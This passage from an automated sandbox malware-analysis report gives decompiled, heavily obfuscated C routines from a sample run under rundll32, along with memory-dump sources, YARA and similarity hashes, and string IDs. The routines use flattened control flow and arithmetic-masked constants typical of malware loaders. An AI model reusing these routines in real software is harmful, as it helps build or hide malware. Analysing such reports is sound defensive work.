                                                                                                                      				signed int _t204;
                                                                                                                      				signed int _t205;
                                                                                                                      				void* _t208;
                                                                                                                      				signed int _t218;
                                                                                                                      				intOrPtr* _t219;
                                                                                                                      				void* _t220;
                                                                                                                      				signed int* _t223;
                                                                                                                      
                                                                                                                      				_t219 = _a8;
                                                                                                                      				_push(_t219);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t181);
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_t223 =  &(( &_v92)[4]);
                                                                                                                      				_v12 = 0x6615d4;
                                                                                                                      				_v8 = 0x63ffda;
                                                                                                                      				_t220 = 0;
                                                                                                                      				_v28 = 0xf9afd3;
                                                                                                                      				_t208 = 0x31efc18;
                                                                                                                      				_v28 = _v28 >> 7;
                                                                                                                      				_v28 = _v28 ^ 0x0001f35e;
                                                                                                                      				_v80 = 0xd84a57;
                                                                                                                      				_v80 = _v80 << 3;
                                                                                                                      				_t204 = 0x18;
                                                                                                                      				_v80 = _v80 * 0x2a;
                                                                                                                      				_v80 = _v80 + 0x45cf;
                                                                                                                      				_v80 = _v80 ^ 0x1be1d7fe;
                                                                                                                      				_v84 = 0xce5c8a;
                                                                                                                      				_v84 = _v84 + 0xa551;
                                                                                                                      				_v84 = _v84 * 0x57;
                                                                                                                      				_v84 = _v84 | 0xfd3f873a;
                                                                                                                      				_v84 = _v84 ^ 0xff78090e;
                                                                                                                      				_v52 = 0xb08f91;
                                                                                                                      				_v52 = _v52 >> 0xc;
                                                                                                                      				_v52 = _v52 + 0xb2fa;
                                                                                                                      				_v52 = _v52 ^ 0x000b6173;
                                                                                                                      				_v56 = 0x674ce5;
                                                                                                                      				_v56 = _v56 + 0x398f;
                                                                                                                      				_v56 = _v56 >> 0x10;
                                                                                                                      				_v56 = _v56 ^ 0x0001bfbd;
                                                                                                                      				_v88 = 0x67105a;
                                                                                                                      				_v88 = _v88 * 0x51;
                                                                                                                      				_v88 = _v88 ^ 0xbb721b0a;
                                                                                                                      				_v88 = _v88 ^ 0x493680b5;
                                                                                                                      				_v88 = _v88 ^ 0xd2dd6d54;
                                                                                                                      				_v60 = 0x6eef31;
                                                                                                                      				_v60 = _v60 << 6;
                                                                                                                      				_v60 = _v60 | 0x99e12062;
                                                                                                                      				_v60 = _v60 ^ 0x9bf73816;
                                                                                                                      				_v92 = 0x911a2f;
                                                                                                                      				_v92 = _v92 ^ 0xd10c2d91;
                                                                                                                      				_v92 = _v92 * 0x5e;
                                                                                                                      				_v92 = _v92 << 7;
                                                                                                                      				_v92 = _v92 ^ 0xdd366504;
                                                                                                                      				_v64 = 0x3fcb13;
                                                                                                                      				_v64 = _v64 >> 0xf;
                                                                                                                      				_v64 = _v64 * 6;
                                                                                                                      				_v64 = _v64 ^ 0x00005971;
                                                                                                                      				_v44 = 0xc7907a;
                                                                                                                      				_v44 = _v44 << 0xb;
                                                                                                                      				_v44 = _v44 >> 0xb;
                                                                                                                      				_v44 = _v44 ^ 0x000cecb3;
                                                                                                                      				_v24 = 0x5cb13a;
                                                                                                                      				_v24 = _v24 | 0x9101a275;
                                                                                                                      				_v24 = _v24 ^ 0x91595ccd;
                                                                                                                      				_v48 = 0x23abf4;
                                                                                                                      				_v48 = _v48 / _t204;
                                                                                                                      				_v48 = _v48 << 2;
                                                                                                                      				_v48 = _v48 ^ 0x0009bb3e;
                                                                                                                      				_v68 = 0x8d9eb5;
                                                                                                                      				_v68 = _v68 >> 0x10;
                                                                                                                      				_v68 = _v68 + 0xf044;
                                                                                                                      				_v68 = _v68 >> 0xe;
                                                                                                                      				_v68 = _v68 ^ 0x000dd2f9;
                                                                                                                      				_v20 = 0x3507ed;
                                                                                                                      				_v20 = _v20 + 0xe3ac;
                                                                                                                      				_v20 = _v20 ^ 0x00302855;
                                                                                                                      				_v32 = 0xacaccb;
                                                                                                                      				_v32 = _v32 ^ 0xc0e60235;
                                                                                                                      				_t205 = 0x4e;
                                                                                                                      				_v32 = _v32 * 0x53;
                                                                                                                      				_v32 = _v32 ^ 0x583b0f23;
                                                                                                                      				_v36 = 0x7d6507;
                                                                                                                      				_v36 = _v36 + 0xffff02b5;
                                                                                                                      				_t191 = _v36;
                                                                                                                      				_t218 = _t191 % _t205;
                                                                                                                      				_v36 = _t191 / _t205;
                                                                                                                      				_v36 = _v36 ^ 0x0005008b;
                                                                                                                      				_v40 = 0xd19b6c;
                                                                                                                      				_v40 = _v40 | 0xa0bb2537;
                                                                                                                      				_v40 = _v40 + 0xffff1d7c;
                                                                                                                      				_v40 = _v40 ^ 0xa0fa32c2;
                                                                                                                      				_v72 = 0xc60854;
                                                                                                                      				_v72 = _v72 | 0x85b2e473;
                                                                                                                      				_v72 = _v72 + 0x7f84;
                                                                                                                      				_v72 = _v72 * 0x36;
                                                                                                                      				_v72 = _v72 ^ 0x423e0813;
                                                                                                                      				_v76 = 0xd43520;
                                                                                                                      				_v76 = _v76 + 0x4339;
                                                                                                                      				_v76 = _v76 + 0xffffe1a4;
                                                                                                                      				_v76 = _v76 >> 0xd;
                                                                                                                      				_v76 = _v76 ^ 0x000c8c56;
                                                                                                                      				do {
                                                                                                                      					while(_t208 != 0x2557e54) {
                                                                                                                      						if(_t208 == 0x31efc18) {
                                                                                                                      							_t208 = 0xe841cef;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t208 == 0xa700901) {
                                                                                                                      								E0017B267(_a4, _t218, _v68,  &_v16, _v20, _t208, _v32, _t220, _v36, _v40, _t208, _v72, _v76, _v80);
                                                                                                                      								 *_t219 = _v16;
                                                                                                                      							} else {
                                                                                                                      								if(_t208 != 0xe841cef) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									_t203 = E0017B267(_a4, _t218, _v84,  &_v16, _v52, _t208, _v56, 0, _v88, _v60, _t208, _v92, _v64, _v28);
                                                                                                                      									_t223 =  &(_t223[0xc]);
                                                                                                                      									if(_t203 != 0) {
                                                                                                                      										_t208 = 0x2557e54;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L14:
                                                                                                                      						return _t220;
                                                                                                                      					}
                                                                                                                      					_push(_t208);
                                                                                                                      					_push(_t208);
                                                                                                                      					_t220 = E00183512(_v16);
                                                                                                                      					if(_t220 == 0) {
                                                                                                                      						_t208 = 0x2fabbe9;
                                                                                                                      						goto L11;
                                                                                                                      					} else {
                                                                                                                      						_t208 = 0xa700901;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L14;
                                                                                                                      					L11:
                                                                                                                      				} while (_t208 != 0x2fabbe9);
                                                                                                                      				goto L14;
                                                                                                                      			}





































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1n$9C$U(0$qY$Lg
                                                                                                                      • API String ID: 0-890920262
                                                                                                                      • Opcode ID: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction ID: 67f60df41d3ed36f9ff90439ebbf3b16dd4b5f09e2561f92aded31fe59294a60
                                                                                                                      • Opcode Fuzzy Hash: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction Fuzzy Hash: 94910DB14097819FC368DF65C58A91BFBF1FB94758F104A0DF2A596260D3B68A48CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0017C309() {
                                                                                                                      				char _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				intOrPtr _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				signed int _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _t177;
                                                                                                                      				void* _t180;
                                                                                                                      				void* _t183;
                                                                                                                      				intOrPtr _t190;
                                                                                                                      				intOrPtr _t192;
                                                                                                                      				signed int _t208;
                                                                                                                      				signed int _t209;
                                                                                                                      				signed int _t210;
                                                                                                                      				signed int* _t213;
                                                                                                                      
                                                                                                                      				_t213 =  &_v604;
                                                                                                                      				_v528 = _v528 & 0x00000000;
                                                                                                                      				_v532 = 0xe4831e;
                                                                                                                      				_t183 = 0x6eb28ed;
                                                                                                                      				_v552 = 0x1276c3;
                                                                                                                      				_v552 = _v552 ^ 0x42b4d72c;
                                                                                                                      				_v552 = _v552 + 0xf95f;
                                                                                                                      				_v552 = _v552 ^ 0x42a4cd0b;
                                                                                                                      				_v548 = 0x347a6a;
                                                                                                                      				_v548 = _v548 | 0x3256b11b;
                                                                                                                      				_v548 = _v548 ^ 0x3277037e;
                                                                                                                      				_v564 = 0x82dd46;
                                                                                                                      				_v564 = _v564 + 0xffffb28a;
                                                                                                                      				_v564 = _v564 << 0xf;
                                                                                                                      				_v564 = _v564 ^ 0x47e00e04;
                                                                                                                      				_v600 = 0xaa25ff;
                                                                                                                      				_v600 = _v600 << 0xd;
                                                                                                                      				_v600 = _v600 + 0xf5f3;
                                                                                                                      				_v600 = _v600 + 0xffff8f6c;
                                                                                                                      				_v600 = _v600 ^ 0x44cc5d5c;
                                                                                                                      				_v556 = 0x1132ac;
                                                                                                                      				_v556 = _v556 | 0x9b4d5b2d;
                                                                                                                      				_v556 = _v556 ^ 0x2eadc533;
                                                                                                                      				_v556 = _v556 ^ 0xb5fd7d8d;
                                                                                                                      				_v536 = 0x11628e;
                                                                                                                      				_v536 = _v536 * 0x4b;
                                                                                                                      				_v536 = _v536 ^ 0x051afcb6;
                                                                                                                      				_v584 = 0xa15265;
                                                                                                                      				_v584 = _v584 << 9;
                                                                                                                      				_t208 = 0x76;
                                                                                                                      				_v584 = _v584 / _t208;
                                                                                                                      				_t209 = 0x44;
                                                                                                                      				_v584 = _v584 * 0x30;
                                                                                                                      				_v584 = _v584 ^ 0x1b1be586;
                                                                                                                      				_v576 = 0xad5a3e;
                                                                                                                      				_v576 = _v576 | 0x6c06410f;
                                                                                                                      				_v576 = _v576 * 0xe;
                                                                                                                      				_v576 = _v576 ^ 0xf19bc2b8;
                                                                                                                      				_v540 = 0x7faa4f;
                                                                                                                      				_v540 = _v540 + 0xffff807e;
                                                                                                                      				_v540 = _v540 ^ 0x007d47f3;
                                                                                                                      				_v544 = 0x15cbe5;
                                                                                                                      				_v544 = _v544 | 0x222269e9;
                                                                                                                      				_v544 = _v544 ^ 0x2236b88c;
                                                                                                                      				_v592 = 0x7f48ca;
                                                                                                                      				_v592 = _v592 << 3;
                                                                                                                      				_v592 = _v592 / _t209;
                                                                                                                      				_v592 = _v592 | 0x6974e558;
                                                                                                                      				_v592 = _v592 ^ 0x697a9c68;
                                                                                                                      				_v568 = 0xdf464;
                                                                                                                      				_v568 = _v568 << 0xf;
                                                                                                                      				_v568 = _v568 | 0x68444ee0;
                                                                                                                      				_v568 = _v568 ^ 0xfa71a6c1;
                                                                                                                      				_v588 = 0x4eabc7;
                                                                                                                      				_v588 = _v588 >> 4;
                                                                                                                      				_v588 = _v588 ^ 0xdf4d904b;
                                                                                                                      				_v588 = _v588 + 0x3b02;
                                                                                                                      				_v588 = _v588 ^ 0xdf416162;
                                                                                                                      				_v596 = 0x2da8e3;
                                                                                                                      				_v596 = _v596 | 0xcaed8666;
                                                                                                                      				_v596 = _v596 + 0xffff0300;
                                                                                                                      				_v596 = _v596 ^ 0x5b73fee0;
                                                                                                                      				_v596 = _v596 ^ 0x9196765f;
                                                                                                                      				_v604 = 0x945bcd;
                                                                                                                      				_v604 = _v604 + 0xffffdd7c;
                                                                                                                      				_v604 = _v604 | 0x6dfc281c;
                                                                                                                      				_v604 = _v604 << 3;
                                                                                                                      				_v604 = _v604 ^ 0x6fe21eca;
                                                                                                                      				_v580 = 0xe4e766;
                                                                                                                      				_t122 =  &_v580; // 0xe4e766
                                                                                                                      				_t210 = 0x1c;
                                                                                                                      				_t177 =  *_t122 / _t210;
                                                                                                                      				_v580 = _t177;
                                                                                                                      				_v580 = _v580 + 0x73a9;
                                                                                                                      				_v580 = _v580 | 0xb028f1fa;
                                                                                                                      				_v580 = _v580 ^ 0xb0236f0a;
                                                                                                                      				_v572 = 0x26d4cb;
                                                                                                                      				_v572 = _v572 ^ 0xbda42e04;
                                                                                                                      				_v572 = _v572 << 8;
                                                                                                                      				_v572 = _v572 ^ 0x82f622a5;
                                                                                                                      				_v560 = 0x78c236;
                                                                                                                      				_v560 = _v560 | 0xc7202908;
                                                                                                                      				_v560 = _v560 >> 9;
                                                                                                                      				_v560 = _v560 ^ 0x0065a40e;
                                                                                                                      				do {
                                                                                                                      					while(_t183 != 0x6eb28ed) {
                                                                                                                      						if(_t183 == 0x7fdcf56) {
                                                                                                                      							return E00171950(_v580, _v572, __eflags, 0,  &_v524,  &_v524, E0018D3C8, _v560);
                                                                                                                      						}
                                                                                                                      						if(_t183 == 0xb7324ef) {
                                                                                                                      							_t177 = E00184FA8(_v588,  &_v524, _v596, _v604);
                                                                                                                      							 *_t177 = 0;
                                                                                                                      							_t183 = 0x7fdcf56;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t220 = _t183 - 0xb9bc25f;
                                                                                                                      						if(_t183 != 0xb9bc25f) {
                                                                                                                      							goto L8;
                                                                                                                      						}
                                                                                                                      						_push(_v600);
                                                                                                                      						_push(_v564);
                                                                                                                      						_push(0x1710cc);
                                                                                                                      						_t180 = E0017AB66(_v552, _v548, _t220);
                                                                                                                      						_t190 =  *0x19520c; // 0x0
                                                                                                                      						_t192 =  *0x19520c; // 0x0
                                                                                                                      						E0017E7CE(_t180, _t220, _v556, _t192 + 8, _t190 + 0x220, _v536, _v584, _v576, _v540, _t190 + 0x220);
                                                                                                                      						_t177 = E0017AE03(_v544, _v592, _v568, _t180);
                                                                                                                      						_t213 =  &(_t213[0xd]);
                                                                                                                      						_t183 = 0xb7324ef;
                                                                                                                      					}
                                                                                                                      					_t183 = 0xb9bc25f;
                                                                                                                      					L8:
                                                                                                                      					__eflags = _t183 - 0x6d02df3;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t177;
                                                                                                                      			}


































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Xti$f$jz4$NDh$i""
                                                                                                                      • API String ID: 0-1033842094
                                                                                                                      • Opcode ID: 939c6160161755bdc97a489d38a89f04fd9c60aec4ceaa9c481cf5673ea32a50
                                                                                                                      • Instruction ID: 1ded4f1488e0e1322a1f910ac922b6918c6a93c5d3ce2246912b2035906d23d9
                                                                                                                      • Opcode Fuzzy Hash: 939c6160161755bdc97a489d38a89f04fd9c60aec4ceaa9c481cf5673ea32a50
                                                                                                                      • Instruction Fuzzy Hash: 16812F711083419FC398CF65DA8A51FBBF1BBD4758F109A1DF29A96260D3B48A09CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0018D3C8(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				intOrPtr _v96;
                                                                                                                      				char _v616;
                                                                                                                      				void* _t202;
                                                                                                                      				void* _t203;
                                                                                                                      				signed int _t210;
                                                                                                                      				signed int _t211;
                                                                                                                      				signed int _t212;
                                                                                                                      				intOrPtr _t226;
                                                                                                                      
                                                                                                                      				_v88 = _v88 & 0x00000000;
                                                                                                                      				_v96 = 0x9df3e3;
                                                                                                                      				_v92 = 0x111c87;
                                                                                                                      				_v84 = 0xa084f0;
                                                                                                                      				_v84 = _v84 | 0x40312458;
                                                                                                                      				_v84 = _v84 ^ 0x40bb7f3e;
                                                                                                                      				_v16 = 0xcefd9d;
                                                                                                                      				_v16 = _v16 + 0xcd96;
                                                                                                                      				_t210 = 0x6a;
                                                                                                                      				_v16 = _v16 * 0xf;
                                                                                                                      				_v16 = _v16 * 0x19;
                                                                                                                      				_v16 = _v16 ^ 0x30695f7a;
                                                                                                                      				_v40 = 0x424711;
                                                                                                                      				_v40 = _v40 + 0x2590;
                                                                                                                      				_v40 = _v40 ^ 0x3a2a5382;
                                                                                                                      				_v40 = _v40 | 0x2443fe5b;
                                                                                                                      				_v40 = _v40 ^ 0x3e6f608b;
                                                                                                                      				_v72 = 0x627874;
                                                                                                                      				_v72 = _v72 >> 0xf;
                                                                                                                      				_v72 = _v72 ^ 0x0000543e;
                                                                                                                      				_v32 = 0xe24590;
                                                                                                                      				_v32 = _v32 | 0xeb3a48f8;
                                                                                                                      				_v32 = _v32 << 7;
                                                                                                                      				_v32 = _v32 * 0x3c;
                                                                                                                      				_v32 = _v32 ^ 0x5522ca4e;
                                                                                                                      				_v48 = 0xd6f907;
                                                                                                                      				_v48 = _v48 << 1;
                                                                                                                      				_v48 = _v48 / _t210;
                                                                                                                      				_v48 = _v48 ^ 0x000b1c59;
                                                                                                                      				_v8 = 0xcfad9d;
                                                                                                                      				_v8 = _v8 << 0xa;
                                                                                                                      				_v8 = _v8 << 6;
                                                                                                                      				_v8 = _v8 + 0xffff7e6c;
                                                                                                                      				_v8 = _v8 ^ 0xad990d89;
                                                                                                                      				_v80 = 0x5a76f4;
                                                                                                                      				_v80 = _v80 << 1;
                                                                                                                      				_v80 = _v80 ^ 0x00be33e4;
                                                                                                                      				_v24 = 0x133aa1;
                                                                                                                      				_v24 = _v24 ^ 0xc65a4b7f;
                                                                                                                      				_v24 = _v24 * 0x1e;
                                                                                                                      				_v24 = _v24 * 0x13;
                                                                                                                      				_v24 = _v24 ^ 0x7f83be07;
                                                                                                                      				_v64 = 0x82e5fc;
                                                                                                                      				_v64 = _v64 + 0xffffc657;
                                                                                                                      				_v64 = _v64 ^ 0x008deef7;
                                                                                                                      				_v52 = 0x864f04;
                                                                                                                      				_v52 = _v52 << 0xd;
                                                                                                                      				_v52 = _v52 + 0xeb96;
                                                                                                                      				_v52 = _v52 ^ 0xc9ef9c56;
                                                                                                                      				_v20 = 0x197ff2;
                                                                                                                      				_v20 = _v20 + 0xffff42c2;
                                                                                                                      				_v20 = _v20 + 0x3e6b;
                                                                                                                      				_v20 = _v20 ^ 0xe022d7dd;
                                                                                                                      				_v20 = _v20 ^ 0xe031a9ca;
                                                                                                                      				_v68 = 0x51f027;
                                                                                                                      				_v68 = _v68 ^ 0xb9085631;
                                                                                                                      				_v68 = _v68 ^ 0xb9589630;
                                                                                                                      				_v56 = 0x8df2a2;
                                                                                                                      				_v56 = _v56 ^ 0x4cb2f0be;
                                                                                                                      				_v56 = _v56 ^ 0x0e08f962;
                                                                                                                      				_v56 = _v56 ^ 0x42319e50;
                                                                                                                      				_v12 = 0x46739a;
                                                                                                                      				_v12 = _v12 + 0x8337;
                                                                                                                      				_v12 = _v12 + 0xd158;
                                                                                                                      				_v12 = _v12 << 0xd;
                                                                                                                      				_v12 = _v12 ^ 0xf903dec7;
                                                                                                                      				_v36 = 0x3dfdbe;
                                                                                                                      				_v36 = _v36 * 0x2f;
                                                                                                                      				_t211 = 0x2a;
                                                                                                                      				_v36 = _v36 / _t211;
                                                                                                                      				_t212 = 0x45;
                                                                                                                      				_v36 = _v36 / _t212;
                                                                                                                      				_v36 = _v36 ^ 0x000da6e6;
                                                                                                                      				_v28 = 0x24761f;
                                                                                                                      				_v28 = _v28 << 9;
                                                                                                                      				_v28 = _v28 + 0xffffc268;
                                                                                                                      				_v28 = _v28 >> 8;
                                                                                                                      				_v28 = _v28 ^ 0x0040fbfa;
                                                                                                                      				_v60 = 0xc6a3a8;
                                                                                                                      				_v60 = _v60 + 0xffff6723;
                                                                                                                      				_v60 = _v60 * 0x24;
                                                                                                                      				_v60 = _v60 ^ 0x1bd7278b;
                                                                                                                      				_v44 = 0xb19a36;
                                                                                                                      				_v44 = _v44 + 0xb2d2;
                                                                                                                      				_v44 = _v44 | 0xf7fdfee7;
                                                                                                                      				_v44 = _v44 ^ 0xf7fbe5a1;
                                                                                                                      				_v76 = 0x3b8058;
                                                                                                                      				_v76 = _v76 | 0x902cc23a;
                                                                                                                      				_v76 = _v76 ^ 0x903f9f8c;
                                                                                                                      				_t226 =  *0x19520c; // 0x0
                                                                                                                      				_t202 = E00184FA8(_v84, _t226 + 0x220, _v16, _v40);
                                                                                                                      				_t234 = _a4 + 0x2c;
                                                                                                                      				_t203 = E0018FC96(_v72, _v32, _a4 + 0x2c, _v48, _t202);
                                                                                                                      				_t243 = _t203;
                                                                                                                      				if(_t203 != 0) {
                                                                                                                      					_push(_v64);
                                                                                                                      					_push(_v24);
                                                                                                                      					_push(0x1710cc);
                                                                                                                      					E0017E7CE(E0017AB66(_v8, _v80, _t243), _t243, _v52,  *((intOrPtr*)(_a8 + 0x14)), _v8, _v20, _v68, _v56, _v12, _t234);
                                                                                                                      					E0017AE03(_v36, _v28, _v60, _t206);
                                                                                                                      					E0017BAB0( &_v616, _v44, _v76);
                                                                                                                      				}
                                                                                                                      				return 1;
                                                                                                                      			}

































                                                                                                                      0x0018d5e3
                                                                                                                      0x0018d5ea
                                                                                                                      0x0018d5f1
                                                                                                                      0x0018d5f8
                                                                                                                      0x0018d5ff
                                                                                                                      0x0018d606
                                                                                                                      0x0018d60d
                                                                                                                      0x0018d614
                                                                                                                      0x0018d621
                                                                                                                      0x0018d630
                                                                                                                      0x0018d63f
                                                                                                                      0x0018d646
                                                                                                                      0x0018d64e
                                                                                                                      0x0018d650
                                                                                                                      0x0018d653
                                                                                                                      0x0018d656
                                                                                                                      0x0018d65f
                                                                                                                      0x0018d68d
                                                                                                                      0x0018d69c
                                                                                                                      0x0018d6ad
                                                                                                                      0x0018d6b5
                                                                                                                      0x0018d6bd

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID: >T$X$1@$k>$txb$z_i0
                                                                                                                      • API String ID: 1586166983-1035483976
                                                                                                                      • Opcode ID: ad7e8996f14c6d6a4e0f922b7923654c4b6da3d1f74d9b8fad807ccf511f9401
                                                                                                                      • Instruction ID: 1efe9061170d557c48d52a39b2402e72296ccbe86d6a7a702677f4446bf6e5ac
                                                                                                                      • Opcode Fuzzy Hash: ad7e8996f14c6d6a4e0f922b7923654c4b6da3d1f74d9b8fad807ccf511f9401
                                                                                                                      • Instruction Fuzzy Hash: 1F91FEB2C00219ABCF18DFE5D98A8DEFBB1FF58308F208159E016B6260D7B55A45CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0018542E(void* __ecx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				unsigned int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				void* _t103;
                                                                                                                      				void* _t104;
                                                                                                                      				void* _t107;
                                                                                                                      				signed int _t109;
                                                                                                                      				signed int _t110;
                                                                                                                      				void* _t119;
                                                                                                                      				void* _t120;
                                                                                                                      				signed int* _t122;
                                                                                                                      
                                                                                                                      				_t122 =  &_v40;
                                                                                                                      				_v16 = 0x36dfa5;
                                                                                                                      				_v16 = _v16 + 0x3b08;
                                                                                                                      				_t107 = __ecx;
                                                                                                                      				_t119 = 0;
                                                                                                                      				_t109 = 0x6b;
                                                                                                                      				_v16 = _v16 / _t109;
                                                                                                                      				_v16 = _v16 ^ 0x0008b2f0;
                                                                                                                      				_t120 = 0x25318c3;
                                                                                                                      				_v32 = 0xe406cb;
                                                                                                                      				_v32 = _v32 + 0xf1ff;
                                                                                                                      				_v32 = _v32 << 0xd;
                                                                                                                      				_t110 = 0x38;
                                                                                                                      				_v32 = _v32 / _t110;
                                                                                                                      				_v32 = _v32 ^ 0x02d3dd20;
                                                                                                                      				_v36 = 0x75fef9;
                                                                                                                      				_v36 = _v36 >> 0xe;
                                                                                                                      				_v36 = _v36 + 0x1d86;
                                                                                                                      				_v36 = _v36 | 0xca94675a;
                                                                                                                      				_v36 = _v36 ^ 0xca99002d;
                                                                                                                      				_v20 = 0xf78cd;
                                                                                                                      				_v20 = _v20 * 0x50;
                                                                                                                      				_v20 = _v20 >> 4;
                                                                                                                      				_v20 = _v20 ^ 0x004e8f0d;
                                                                                                                      				_v24 = 0x451f1c;
                                                                                                                      				_v24 = _v24 + 0xffffecca;
                                                                                                                      				_v24 = _v24 + 0xffffe02c;
                                                                                                                      				_v24 = _v24 ^ 0x0044bfd9;
                                                                                                                      				_v40 = 0xfdbfec;
                                                                                                                      				_v40 = _v40 << 8;
                                                                                                                      				_v40 = _v40 + 0x2a17;
                                                                                                                      				_v40 = _v40 ^ 0x2ee485ab;
                                                                                                                      				_v40 = _v40 ^ 0xd32b8602;
                                                                                                                      				_v28 = 0xc36f29;
                                                                                                                      				_v28 = _v28 >> 0xa;
                                                                                                                      				_v28 = _v28 + 0xffff93a5;
                                                                                                                      				_v28 = _v28 ^ 0xfffd5496;
                                                                                                                      				_v4 = 0xb22cca;
                                                                                                                      				_v4 = _v4 * 0x61;
                                                                                                                      				_v4 = _v4 ^ 0x438b1823;
                                                                                                                      				_v8 = 0x4d4bc7;
                                                                                                                      				_v8 = _v8 + 0xffff7d22;
                                                                                                                      				_v8 = _v8 ^ 0x00436970;
                                                                                                                      				_v12 = 0xfbac3c;
                                                                                                                      				_v12 = _v12 | 0x3e605f41;
                                                                                                                      				_v12 = _v12 << 4;
                                                                                                                      				_v12 = _v12 ^ 0xefb5eaa0;
                                                                                                                      				do {
                                                                                                                      					while(_t120 != 0x25318c3) {
                                                                                                                      						if(_t120 == 0x409e50d) {
                                                                                                                      							_t103 = E0018274F();
                                                                                                                      							_t122 = _t122 - 0xc + 0xc;
                                                                                                                      							_t120 = 0x7f367f8;
                                                                                                                      							_t119 = _t119 + _t103;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t120 == 0x7f367f8) {
                                                                                                                      								_t104 = E0017B782(_t107 + 0xc, _v24, _v40, _v28);
                                                                                                                      								_t122 =  &(_t122[2]);
                                                                                                                      								_t120 = 0xdeee07a;
                                                                                                                      								_t119 = _t119 + _t104;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t120 != 0xdeee07a) {
                                                                                                                      									goto L10;
                                                                                                                      								} else {
                                                                                                                      									_t119 = _t119 + E0017B782(_t107 + 4, _v4, _v8, _v12);
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L6:
                                                                                                                      						return _t119;
                                                                                                                      					}
                                                                                                                      					_t120 = 0x409e50d;
                                                                                                                      					L10:
                                                                                                                      				} while (_t120 != 0xb6d7b22);
                                                                                                                      				goto L6;
